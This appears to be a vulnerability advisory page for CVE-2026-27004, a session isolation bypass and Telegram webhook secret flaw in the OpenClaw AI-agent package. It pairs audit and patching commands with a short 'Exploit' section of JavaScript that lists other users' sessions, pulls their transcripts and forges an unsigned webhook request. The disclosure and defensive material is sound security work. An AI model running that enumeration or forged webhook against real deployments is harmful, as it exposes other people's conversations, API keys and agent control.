Listen to this Post
How CVE-2026-27004 Works
The vulnerability stems from two distinct but related issues in OpenClaw versions up to 2026.2.14 . First, in shared-agent deployments, the session management tools (sessions_list, sessions_history, sessions_send) allowed broader session targeting than operators intended, meaning a user in a multi-tenant environment could potentially access transcript content from peer sessions due to insufficient visibility scoping . This is fundamentally a configuration and authorization issue where session boundaries were not properly enforced when multiple users shared the same agent instance . Second, in Telegram webhook mode, the monitor startup routine failed to fall back to the per-account `webhookSecret` when only the account-level secret was configured, creating potential for webhook endpoint misconfiguration . The flaw is exacerbated by OpenClaw’s default session handling where direct messages often share a single “main” session context, meaning environment variables, API keys, and conversation history loaded for one user could become visible to others who message the same bot . In group chat scenarios, tools invoked without proper sandboxing could access files and credentials across what should have been isolated sessions . The fix introduces a new `tools.sessions.visibility` configuration option with granular settings (self | tree | agent | all) defaulting to `tree` to restrict session tool access, while implementing proper secret fallback for Telegram webhook authentication .
DailyCVE Form
Platform: npm openclaw
Version: <= 2026.2.14
Vulnerability: Session isolation bypass
Severity: Moderate
Date: 2026-02-18
Prediction: Patched 2026-02-15
What Undercode Say:
Analytics
Check current OpenClaw version openclaw --version Inspect current session visibility configuration cat ~/.openclaw/config.yaml | grep -A 5 "tools.sessions" List all active sessions to identify potential cross-session exposure openclaw sessions_list --all Examine session history for unexpected cross-session data access openclaw sessions_history --session-id TARGET_SESSION_ID Check Telegram webhook configuration for missing account-level fallback grep -r "webhookSecret" ~/.openclaw/channels/telegram/ Simulate session tool access from different peer context curl -X GET http://localhost:18789/api/sessions \ -H "X-User-Context: peer-2" \ -H "Authorization: Bearer $TOKEN" Audit logs for unauthorized session access attempts grep "sessions_list|sessions_history" ~/.openclaw/logs/audit.log | grep -v "allowed" Verify sandbox clamping behavior for restricted sessions cat ~/.openclaw/config.yaml | grep "sandbox.clamping"
Exploit
// Example: Cross-session transcript enumeration via session tools
// Attacker with limited access attempts to list all agent sessions
const axios = require('axios');
async function enumerateSessions(baseURL, token) {
try {
// Attempt to list all sessions beyond allowed scope
const response = await axios.get(<code>${baseURL}/api/sessions/list</code>, {
headers: {
'Authorization': <code>Bearer ${token}</code>,
'X-User-Context': 'malicious-peer'
},
params: {
scope: 'all' // Attempt to override default scoping
}
});
console.log('Discovered sessions:', response.data);
// Extract transcript from another user's session
if (response.data.sessions && response.data.sessions.length > 0) {
for (const session of response.data.sessions) {
if (session.userId !== 'attacker') {
const history = await axios.get(<code>${baseURL}/api/sessions/history</code>, {
headers: { 'Authorization': `Bearer ${token}` },
params: { sessionId: session.id }
});
console.log(<code>Transcript from session ${session.id}:</code>, history.data);
}
}
}
} catch (error) {
console.error('Enumeration failed:', error.message);
}
}
// Telegram webhook secret misconfiguration check
// If account-level secret missing, monitor fails open
const crypto = require('crypto');
const webhookPayload = {
update_id: 12345,
message: { text: '/start', from: { id: 999999 } }
};
// Forge unsigned webhook request
axios.post('https://your-openclaw-instance.com/telegram-webhook', webhookPayload, {
headers: { 'Content-Type': 'application/json' }
}).then(response => {
console.log('Webhook accepted without secret:', response.status);
}).catch(err => {
console.log('Webhook properly rejected:', err.response.status);
});
Protection
IMMEDIATE ACTIONS 1. Upgrade to patched version (2026.2.15 or later) npm install -g openclaw@latest 2. Verify upgrade and version openclaw --version Should show 2026.2.15 or higher 3. Configure session visibility scoping cat >> ~/.openclaw/config.yaml << 'EOF' tools: sessions: visibility: tree Options: self | tree | agent | all default_scope: tree enforce_strict: true sandbox: clamping: true restrict_cross_session: true EOF 4. Set proper Telegram webhook secrets for all accounts openclaw config set channels.telegram.account-level.webhookSecret "$(openssl rand -hex 32)" openclaw config set channels.telegram.per-account-fallback true 5. Apply sandbox clamping for non-main sessions openclaw config set sandbox.per_session_workspace true openclaw config set sandbox.no_default_workspace_access true 6. Restrict session tool access by default openclaw config set permissions.sessions_tools.require_approval true openclaw config set permissions.sessions_tools.allowed_roles '["admin","owner"]' 7. Rotate all existing session tokens and credentials openclaw auth rotate-all-tokens openclaw config set auth.token "$(openssl rand -hex 32)" 8. Enable audit logging for session access openclaw config set audit.sessions_tools true openclaw config set audit.log_level verbose 9. Restart OpenClaw gateway to apply changes systemctl --user restart openclaw-gateway 10. Verify fix implementation openclaw debug check-session-isolation --test-cross-peer openclaw debug test-telegram-webhook --with-secret-fallback
Impact
Successful exploitation allows unauthorized access to session transcripts across peer boundaries in multi-user environments, potentially exposing sensitive conversation history, API keys loaded into shared sessions, and internal files accessible through the session context . In Telegram webhook mode, missing secret fallback could allow unauthenticated webhook requests to be processed, leading to potential injection of malicious commands into the agent’s message queue . The vulnerability primarily affects shared-agent deployments where multiple users interact with the same bot instance without proper isolation, such as team environments or public-facing agents . Single-agent or fully trusted deployments face limited practical impact . However, when combined with other misconfigurations—such as broad tool allowlists or shared workspace access—an attacker could escalate session access to data exfiltration, credential theft, or unauthorized agent reconfiguration . The fix introduces mandatory session visibility controls and proper webhook authentication, preventing cross-session data leakage and ensuring Telegram endpoints validate incoming requests with the correct per-account secrets .
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

